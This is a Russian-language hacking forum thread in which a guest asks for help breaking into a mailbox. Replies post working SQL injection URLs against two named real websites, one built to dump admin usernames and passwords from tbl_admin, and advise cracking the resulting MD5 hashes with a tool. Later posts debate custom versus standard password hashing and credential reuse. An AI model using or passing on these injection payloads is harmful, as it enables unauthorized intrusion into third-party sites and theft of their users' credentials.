OP
welcomeinside
Guest
- Thread Starter
- #101
а подробнее?А дальше уже дело техники получить все что интересует из БД.
а подробнее?А дальше уже дело техники получить все что интересует из БД.
а смысл? Готового рецепта всё равно не существует.а подробнее?
ого!!Убери пробел в слове password
а смысл? Готового рецепта всё равно не существует.
Берешь программу типа md5inside и расшифровываешь его.чо с этим дальше делать?
ящик на resolutiondev.com?как? не существует?
у меня смысл - взломать свой собственный ящик.
не. на chat.ruящик на resolutiondev.com?
тогда в чем смысл ломиться на resolutiondev.com?не. на chat.ru
Исходя из:тогда в чем смысл ломиться на resolutiondev.com?
Тренируетсяwelcomeinside, тренируйся накошках
пендосах
например
возможна инъекцияКод:http://www.resolutiondev.com/content.php?id=-41+union+select+1,2,3,group_concat(username,0x3a,p%20assword),5,6,7+from+tbl_admin%20--
или на хачикахчитай профильные форумы и будешь крутым хацкеромКод:http://old.sms-kavkaz.ru/ind.php?pn=0&id_categ=-3+union+select+version(),2,3,4,5,6,user(),8,9,10,1%20%201,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+
Гы !
В общем хакеры и взломщики паролей, это выдумки ?
Взломал?как? не существует?
у меня смысл - взломать свой собственный ящик.
А что есть нормальная система? и что есть не стандартные алгоритмы хеша?В нормальной системе:
- нет известных дыр, через которые можно вытащить базу - а если такие дыры находят, то их очень быстро закрывают
- хэш пароля считается нестандартным алгоритмом, который недоступен для злоумышленника
ну как что, вместо проверенных грамотными специалистами алгоритмов с известной стойкостью взять какую-нибудь мульку типа crc:=crc + (a XOR rand()) и надеяться, что ее никто не сломает, потому что никто не знаети что есть не стандартные алгоритмы хеша?
А что есть нормальная система?
и что есть не стандартные алгоритмы хеша?
ну как что, вместо проверенных грамотными специалистами алгоритмов с известной стойкостью взять какую-нибудь мульку типа crc:=crc + (a XOR rand()) и надеяться, что ее никто не сломает, потому что никто не знает
в курсе, как разрабатываются криптоалгоритмы, как их тестируют на стойкость и сколько времени на это нужно? И, главное, зачем?Видимо, некий проприетарный криптоалгоритм, а не MD5 сотоварищи.
в курсе, как разрабатываются криптоалгоритмы, как их тестируют на стойкость и сколько времени на это нужно? И, главное, зачем?
:swoon2:Если используется не стандартный алгоритм - достаточно сравнительно небольшой модификации - то подобрать пароль будет гораздо сложнее - при грамотной корректировке в принципе невозможно
попробуйте, например, подобрать для алгоритма ГОСТ Р 34.11 (а на территории РФ использовать другие для официального информационного обмена запрещено).можно за сравнительно небольшое время подобрать пароли
сразу и не допер, действительно, если в базе хранится не модифицированный хэш, то подобрав по словарю пароль, можно зайти на сайт. Только, что там делать, если уже есть доступ к БД?Затем, чтобы свистнув базу акков нельзя было ломануть пароли, с чем столкнулись уже многие крупные игроки инет-продаж.
А дальше срабатывает психология. Человек - существо, как правило, ленивое. Он обычно использует одну и ту же пару логин-пароль во всех сервисах. В т.ч., например, платёжных.сразу и не допер, действительно, если в базе хранится не модифицированный хэш, то подобрав по словарю пароль, можно зайти на сайт. Только, что там делать, если уже есть доступ к БД?